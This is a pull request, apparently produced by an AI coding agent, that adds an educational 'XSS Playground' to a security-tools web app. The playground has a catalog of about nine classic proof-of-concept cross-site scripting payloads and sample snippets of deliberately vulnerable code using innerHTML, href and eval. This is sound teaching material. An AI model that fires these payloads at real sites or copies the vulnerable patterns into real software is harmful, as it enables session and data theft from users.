### PR TITLE
[apps] Add XSS payload catalog and playground UI

### DIFF
--- a/apps.config.js
+++ b/apps.config.js
@@ -111,6 +111,7 @@ const SecurityToolsApp = createDynamicApp('security-tools', 'Security Tools');
 const SSHApp = createDynamicApp('ssh', 'SSH Command Builder');
 const HTTPApp = createDynamicApp('http', 'HTTP Request Builder');
 const HtmlRewriteApp = createDynamicApp('html-rewriter', 'HTML Rewriter');
+const XssPlaygroundApp = createDynamicApp('xss-playground', 'XSS Playground');
 const ContactApp = createDynamicApp('contact', 'Contact');
 
 
@@ -196,6 +197,7 @@ const displaySecurityTools = createDisplay(SecurityToolsApp);
 const displaySSH = createDisplay(SSHApp);
 const displayHTTP = createDisplay(HTTPApp);
 const displayHtmlRewrite = createDisplay(HtmlRewriteApp);
+const displayXssPlayground = createDisplay(XssPlaygroundApp);
 const displayContact = createDisplay(ContactApp);
 
 const displayHashcat = createDisplay(HashcatApp);
@@ -906,6 +908,15 @@ const apps = [
     favourite: false,
     desktop_shortcut: false,
     screen: displayHtmlRewrite,
+  },
+  {
+    id: 'xss-playground',
+    title: 'XSS Playground',
+    icon: '/themes/Yaru/apps/radar-symbolic.svg',
+    disabled: false,
+    favourite: false,
+    desktop_shortcut: false,
+    screen: displayXssPlayground,
   },
   {
     id: 'contact',

--- a/apps/xss-playground/index.tsx
+++ b/apps/xss-playground/index.tsx
@@ -1,0 +1,284 @@
+'use client';
+
+import React, { useMemo, useState, useId } from 'react';
+import PayloadCatalog from '../../components/apps/xss-playground/PayloadCatalog';
+import type { PayloadDefinition, PayloadGroup } from '../../components/apps/xss-playground/payloads';
+
+interface SinkHarness {
+  id: string;
+  label: string;
+  context: string;
+  sinkType: string;
+  description: string;
+  effect: string;
+  placeholder: string;
+  sampleCode: (payload: string) => string;
+}
+
+interface SelectedPayloadMeta {
+  groupId: string;
+  groupTitle: string;
+  payload: PayloadDefinition;
+}
+
+const sinkHarnesses: SinkHarness[] = [
+  {
+    id: 'dom-inner-html',
+    label: 'DOM innerHTML',
+    context: 'HTML fragment',
+    sinkType: 'element.innerHTML',
+    description:
+      'Simulates writing untrusted HTML directly into the DOM via innerHTML or document.write without escaping.',
+    effect:
+      'Any scripts or event handlers in the fragment could execute immediately when a vulnerable application renders it.',
+    placeholder: '<img src="x" onerror="alert(\'xss\')">',
+    sampleCode: (payload) => {
+      const serialized = JSON.stringify(payload || '<payload>');
+      return [
+        '// userInput arrives from an untrusted source',
+        `const userInput = ${serialized};`,
+        "const container = document.getElementById('preview');",
+        'container.innerHTML = userInput;',
+      ].join('\n');
+    },
+  },
+  {
+    id: 'attribute-href',
+    label: 'Link href attribute',
+    context: 'URL attribute',
+    sinkType: 'element.href',
+    description:
+      'Demonstrates assigning untrusted input to an anchor href attribute without protocol filtering.',
+    effect:
+      'If the value begins with javascript: or a data URI it can execute code when the link is clicked.',
+    placeholder: 'javascript:alert(document.domain)',
+    sampleCode: (payload) => {
+      const serialized = JSON.stringify(payload || 'javascript:alert(1)');
+      return [
+        '// developer expects a normal URL',
+        `const userInput = ${serialized};`,
+        "const link = document.querySelector('a.preview-link');",
+        'link.href = userInput;',
+        "link.textContent = userInput;",
+      ].join('\n');
+    },
+  },
+  {
+    id: 'script-template',
+    label: 'Inline script template',
+    context: 'Script string literal',
+    sinkType: 'string interpolation',
+    description:
+      'Shows what happens when untrusted data is interpolated inside an inline <script> block string.',
+    effect:
+      'Breaking out of the string lets the payload run code before the legitimate script continues executing.',
+    placeholder: '";alert(\'xss\');//',
+    sampleCode: (payload) => {
+      const serialized = JSON.stringify(payload || "\";alert('xss');//");
+      return [
+        '// templating inside a <script> tag',
+        `const userInput = ${serialized};`,
+        'const script = `const message = "${userInput}";`;',
+        'eval(script); // vulnerable pattern',
+      ].join('\n');
+    },
+  },
+];
+
+const createInitialState = <T,>(value: T) => {
+  const initial: Record<string, T> = {};
+  for (const sink of sinkHarnesses) {
+    initial[sink.id] = value;
+  }
+  return initial;
+};
+
+const XssPlayground: React.FC = () => {
+  const payloadInputId = useId();
+  const [activeSinkId, setActiveSinkId] = useState<string>(sinkHarnesses[0].id);
+  const [payloadValues, setPayloadValues] = useState<Record<string, string>>(() =>
+    createInitialState(''),
+  );
+  const [payloadMeta, setPayloadMeta] = useState<Record<string, SelectedPayloadMeta | null>>(() =>
+    createInitialState<SelectedPayloadMeta | null>(null),
+  );
+  const [announcement, setAnnouncement] = useState('');
+
+  const activeSink = useMemo(
+    () => sinkHarnesses.find((sink) => sink.id === activeSinkId) ?? sinkHarnesses[0],
+    [activeSinkId],
+  );
+
+  const activePayloadValue = payloadValues[activeSink.id] ?? '';
+  const activePayloadMeta = payloadMeta[activeSink.id] ?? null;
+  const sinkDescriptionId = `sink-${activeSink.id}-description`;
+  const selectedPayloadId = activePayloadMeta
+    ? `selected-payload-${activeSink.id}`
+    : undefined;
+  const describedBy = [sinkDescriptionId, selectedPayloadId].filter(Boolean).join(' ');
+
+  const updatePayloadValue = (value: string) => {
+    setPayloadValues((prev) => ({ ...prev, [activeSink.id]: value }));
+    setPayloadMeta((prev) => ({ ...prev, [activeSink.id]: null }));
+    setAnnouncement('');
+  };
+
+  const handlePayloadSelect = (payload: PayloadDefinition, group: PayloadGroup) => {
+    const sinkLabel = `${activeSink.label} harness`;
+    setPayloadValues((prev) => ({ ...prev, [activeSink.id]: payload.snippet }));
+    setPayloadMeta((prev) => ({
+      ...prev,
+      [activeSink.id]: {
+        groupId: group.id,
+        groupTitle: group.title,
+        payload,
+      },
+    }));
+
+    if (typeof navigator !== 'undefined' && navigator.clipboard?.writeText) {
+      navigator.clipboard
+        .writeText(payload.snippet)
+        .then(() =>
+          setAnnouncement(
+            `Copied "${payload.title}" into the clipboard and filled the ${sinkLabel}.`,
+          ),
+        )
+        .catch(() =>
+          setAnnouncement(
+            `Filled the ${sinkLabel} with "${payload.title}". Unable to copy automatically.`,
+          ),
+        );
+    } else {
+      setAnnouncement(`Filled the ${sinkLabel} with "${payload.title}".`);
+    }
+  };
+
+  const vulnerableSnippet = activeSink.sampleCode(activePayloadValue);
+
+  return (
+    <div className="flex h-full min-h-screen flex-col bg-gray-950 text-white lg:flex-row">
+      <div className="flex-1 overflow-auto">
+        <div className="mx-auto flex w-full max-w-4xl flex-col gap-6 p-6">
+          <header className="space-y-2">
+            <h1 className="text-3xl font-semibold">XSS Playground</h1>
+            <p className="text-sm text-gray-300">
+              Experiment with common cross-site scripting payloads in a safe harness. Select a sink to
+              see how untrusted input moves through different vulnerable patterns.
+            </p>
+          </header>
+
+          <nav
+            role="tablist"
+            aria-label="XSS sink harnesses"
+            className="flex flex-wrap gap-2"
+          >
+            {sinkHarnesses.map((sink) => {
+              const isActive = sink.id === activeSink.id;
+              return (
+                <button
+                  key={sink.id}
+                  type="button"
+                  role="tab"
+                  id={`${sink.id}-tab`}
+                  aria-selected={isActive}
+                  aria-controls={`${sink.id}-panel`}
+                  onClick={() => {
+                    setActiveSinkId(sink.id);
+                    setAnnouncement('');
+                  }}
+                  className={`rounded px-3 py-2 text-sm font-medium transition focus:outline-none focus-visible:ring-2 focus-visible:ring-blue-300 ${
+                    isActive
+                      ? 'bg-blue-600 text-white shadow'
+                      : 'bg-gray-800 text-gray-200 hover:bg-gray-700'
+                  }`}
+                  title={`${sink.context} via ${sink.sinkType}`}
+                >
+                  {sink.label}
+                </button>
+              );
+            })}
+          </nav>
+
+          <section
+            id={`${activeSink.id}-panel`}
+            role="tabpanel"
+            aria-labelledby={`${activeSink.id}-tab`}
+            className="space-y-4 rounded-lg border border-gray-800 bg-gray-900/60 p-4"
+          >
+            <div
+              id={sinkDescriptionId}
+              className="rounded-lg border border-gray-800 bg-black/40 p-4"
+            >
+              <p className="text-xs uppercase tracking-wide text-gray-400">Active sink</p>
+              <p className="text-lg font-semibold text-white">{activeSink.label}</p>
+              <p className="text-xs text-gray-400">
+                {activeSink.context} • {activeSink.sinkType}
+              </p>
+              <p className="mt-2 text-sm text-gray-300">{activeSink.description}</p>
+            </div>
+
+            <div className="space-y-2">
+              <label htmlFor={payloadInputId} className="text-sm font-medium text-white">
+                Harness input
+              </label>
+              <textarea
+                id={payloadInputId}
+                value={activePayloadValue}
+                onChange={(event) => updatePayloadValue(event.target.value)}
+                placeholder={activeSink.placeholder}
+                aria-describedby={describedBy || undefined}
+                className="min-h-[120px] w-full rounded-lg border border-gray-800 bg-black/40 p-3 font-mono text-sm text-green-200 focus:outline-none focus-visible:ring-2 focus-visible:ring-blue-400"
+              />
+              <p className="text-xs text-gray-400">
+                Payloads inserted here are simulated; nothing is ever executed against another site.
+              </p>
+            </div>
+
+            {activePayloadMeta && (
+              <div
+                id={selectedPayloadId}
+                className="rounded-lg border border-blue-500/40 bg-blue-900/20 p-3 text-xs text-blue-100"
+              >
+                <p className="font-semibold text-blue-100">{activePayloadMeta.payload.title}</p>
+                <p className="mt-1 text-blue-200">{activePayloadMeta.payload.description}</p>
+                <p className="mt-1 text-blue-300">
+                  Group: {activePayloadMeta.groupTitle} • {activePayloadMeta.payload.context} via{' '}
+                  {activePayloadMeta.payload.sinkType}
+                </p>
+              </div>
+            )}
+
+            <div className="space-y-3">
+              <h2 className="text-sm font-semibold text-gray-200">Vulnerable snippet</h2>
+              <pre className="max-h-64 overflow-auto rounded bg-black/60 p-3 font-mono text-xs text-green-300">
+                {vulnerableSnippet}
+              </pre>
+              <h2 className="text-sm font-semibold text-gray-200">Simulated output</h2>
+              <div className="rounded bg-black/40 p-3">
+                {activePayloadValue ? (
+                  <code className="block whitespace-pre-wrap break-words font-mono text-green-300">
+                    {activePayloadValue}
+                  </code>
+                ) : (
+                  <p className="text-xs text-gray-500">Provide a payload to preview it here.</p>
+                )}
+              </div>
+              <p className="text-xs text-gray-400">{activeSink.effect}</p>
+            </div>
+          </section>
+
+          <div role="status" aria-live="polite" className="text-xs text-emerald-300">
+            {announcement}
+          </div>
+        </div>
+      </div>
+      <PayloadCatalog
+        className="lg:w-96"
+        activeSinkLabel={activeSink.label}
+        onPayloadSelect={handlePayloadSelect}
+      />
+    </div>
+  );
+};
+
+export default XssPlayground;

--- a/components/apps/xss-playground/PayloadCatalog.tsx
+++ b/components/apps/xss-playground/PayloadCatalog.tsx
@@ -1,0 +1,83 @@
+'use client';
+
+import React, { useId } from 'react';
+import type { PayloadDefinition, PayloadGroup } from './payloads';
+import { payloadGroups } from './payloads';
+
+interface PayloadCatalogProps {
+  activeSinkLabel: string;
+  onPayloadSelect: (payload: PayloadDefinition, group: PayloadGroup) => void;
+  className?: string;
+}
+
+const PayloadCatalog: React.FC<PayloadCatalogProps> = ({
+  activeSinkLabel,
+  onPayloadSelect,
+  className,
+}) => {
+  const headingId = useId();
+
+  return (
+    <aside
+      role="complementary"
+      aria-labelledby={headingId}
+      className={`bg-gray-950 text-white border-t border-gray-800 lg:border-t-0 lg:border-l ${className ?? ''}`}
+    >
+      <div className="sticky top-0 z-10 border-b border-gray-800 bg-gray-950/95 px-4 py-3 backdrop-blur">
+        <h2 id={headingId} className="text-lg font-semibold">
+          Payload catalog
+        </h2>
+        <p className="mt-1 text-xs text-gray-400">
+          Choose a payload to copy it to your clipboard and populate the active harness input.
+        </p>
+      </div>
+      <div className="max-h-full overflow-y-auto px-4 py-4 space-y-6">
+        {payloadGroups.map((group) => (
+          <section key={group.id} aria-labelledby={`${group.id}-heading`} className="space-y-3">
+            <header>
+              <h3
+                id={`${group.id}-heading`}
+                className="text-sm font-semibold uppercase tracking-wide text-gray-300"
+              >
+                {group.title}
+              </h3>
+              <p className="mt-1 text-xs text-gray-400">{group.description}</p>
+            </header>
+            <ul className="space-y-3">
+              {group.payloads.map((payload) => (
+                <li
+                  key={payload.id}
+                  className="rounded-lg border border-gray-800 bg-gray-900/60 p-3 shadow-sm transition hover:border-blue-500"
+                >
+                  <div className="flex items-start justify-between gap-3">
+                    <div>
+                      <p className="text-sm font-semibold text-white">{payload.title}</p>
+                      <p className="text-xs text-gray-400">
+                        {payload.context} • {payload.sinkType}
+                      </p>
+                    </div>
+                    <button
+                      type="button"
+                      onClick={() => onPayloadSelect(payload, group)}
+                      className="rounded bg-blue-600 px-3 py-1 text-xs font-semibold uppercase tracking-wide text-white shadow focus:outline-none focus-visible:ring-2 focus-visible:ring-blue-300"
+                      aria-label={`Copy payload "${payload.title}" for ${payload.context} using ${payload.sinkType} and fill the ${activeSinkLabel} harness input.`}
+                      title={`${payload.title} — ${payload.context} via ${payload.sinkType}`}
+                    >
+                      Copy &amp; Fill
+                    </button>
+                  </div>
+                  <p className="mt-2 text-xs text-gray-300">{payload.description}</p>
+                  <pre className="mt-2 max-h-32 overflow-auto whitespace-pre-wrap rounded bg-black/60 p-2 font-mono text-xs text-green-300">
+                    {payload.snippet}
+                  </pre>
+                </li>
+              ))}
+            </ul>
+          </section>
+        ))}
+      </div>
+    </aside>
+  );
+};
+
+export default PayloadCatalog;

--- a/components/apps/xss-playground/index.tsx
+++ b/components/apps/xss-playground/index.tsx
@@ -1,0 +1,1 @@
+export { default } from '../../../apps/xss-playground';

--- a/components/apps/xss-playground/payloads.ts
+++ b/components/apps/xss-playground/payloads.ts
@@ -1,0 +1,125 @@
+export interface PayloadDefinition {
+  id: string;
+  title: string;
+  context: string;
+  sinkType: string;
+  snippet: string;
+  description: string;
+}
+
+export interface PayloadGroup {
+  id: string;
+  title: string;
+  description: string;
+  payloads: PayloadDefinition[];
+}
+
+export const payloadGroups: PayloadGroup[] = [
+  {
+    id: 'dom-html',
+    title: 'HTML element contexts',
+    description:
+      'Snippets that execute when user input is written into the DOM with innerHTML, outerHTML, or document.write.',
+    payloads: [
+      {
+        id: 'script-alert',
+        title: 'Classic script tag',
+        context: 'HTML fragment',
+        sinkType: 'element.innerHTML',
+        snippet: "<script>alert(document.domain)</script>",
+        description:
+          'Injects a script element that immediately executes in browsers that evaluate HTML fragments as code.',
+      },
+      {
+        id: 'image-onerror',
+        title: 'Image error handler',
+        context: 'HTML attribute',
+        sinkType: 'element.innerHTML',
+        snippet: '<img src="x" onerror="alert(\'xss\')" />',
+        description:
+          'Leverages an <img> error handler; when the broken image fails to load, the onerror script runs.',
+      },
+      {
+        id: 'svg-onload',
+        title: 'SVG onload',
+        context: 'SVG fragment',
+        sinkType: 'document.write',
+        snippet: '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(\'xss\')"></svg>',
+        description:
+          'Uses an inline SVG that fires onload immediately, useful for sinks that sanitize only HTML elements.',
+      },
+    ],
+  },
+  {
+    id: 'url-attributes',
+    title: 'URL & attribute sinks',
+    description:
+      'Useful for testing href, src, or similar assignments where untrusted data is dropped into a URL attribute.',
+    payloads: [
+      {
+        id: 'javascript-protocol',
+        title: 'javascript: URI',
+        context: 'Hyperlink attribute',
+        sinkType: 'element.href',
+        snippet: 'javascript:alert(document.cookie)',
+        description:
+          'Abuses the javascript: protocol so a click executes code instead of navigating to a different origin.',
+      },
+      {
+        id: 'data-uri',
+        title: 'data:text/html wrapper',
+        context: 'Hyperlink attribute',
+        sinkType: 'element.href',
+        snippet: "data:text/html,<script>alert('xss')</script>",
+        description:
+          'Wraps a payload in a data URI to trigger script execution in a new document when the link is opened.',
+      },
+      {
+        id: 'srcdoc-iframe',
+        title: 'srcdoc iframe payload',
+        context: 'iframe attribute',
+        sinkType: 'iframe.srcdoc',
+        snippet: '<iframe srcdoc="<script>alert(\'xss\')</script>"></iframe>',
+        description:
+          'Targets features that populate iframe.srcdoc or similar attributes without sanitization.',
+      },
+    ],
+  },
+  {
+    id: 'script-templates',
+    title: 'Script & template escapes',
+    description:
+      'Break out of JavaScript or attribute string templates by injecting delimiters and inline statements.',
+    payloads: [
+      {
+        id: 'string-breakout',
+        title: 'Break out of double quotes',
+        context: 'Inline script string literal',
+        sinkType: 'string interpolation',
+        snippet: '";alert(\'xss\');//',
+        description:
+          'Closes a double-quoted string, runs alert(), and comments out the remainder of the vulnerable script.',
+      },
+      {
+        id: 'single-quote-breakout',
+        title: 'Break out of single quotes',
+        context: 'Inline script string literal',
+        sinkType: 'string interpolation',
+        snippet: "';alert('xss');//",
+        description:
+          'Pairs with sinks that wrap data in single quotes, leaving a trailing comment to avoid syntax errors.',
+      },
+      {
+        id: 'script-end-tag',
+        title: 'End script with HTML payload',
+        context: 'Inline script escaped into HTML',
+        sinkType: 'script block',
+        snippet: '</script><img src=x onerror="alert(\'xss\')">',
+        description:
+          'Terminates the current <script> tag and injects HTML that executes immediately when parsed.',
+      },
+    ],
+  },
+];
+
+export type PayloadGroups = typeof payloadGroups;

--- a/pages/apps/xss-playground.jsx
+++ b/pages/apps/xss-playground.jsx
@@ -1,0 +1,7 @@
+import dynamic from 'next/dynamic';
+
+const XssPlayground = dynamic(() => import('../../apps/xss-playground'), { ssr: false });
+
+export default function XssPlaygroundPage() {
+  return <XssPlayground />;
+}


### PR DESCRIPTION
## Summary
- add grouped payload definitions and catalog UI for the new XSS playground
- build the playground layout with an accessible harness selector and preview
- register the playground in the desktop app registry and expose a routed page

## Testing
- yarn lint *(fails: existing jsx-a11y and no-top-level-window issues across legacy apps)*
- yarn test *(fails: pre-existing suites such as window.test.tsx and nmapNse.test.tsx)*

------
https://chatgpt.com/codex/tasks/task_e_68cc476099848328afc999a48fc4b7b7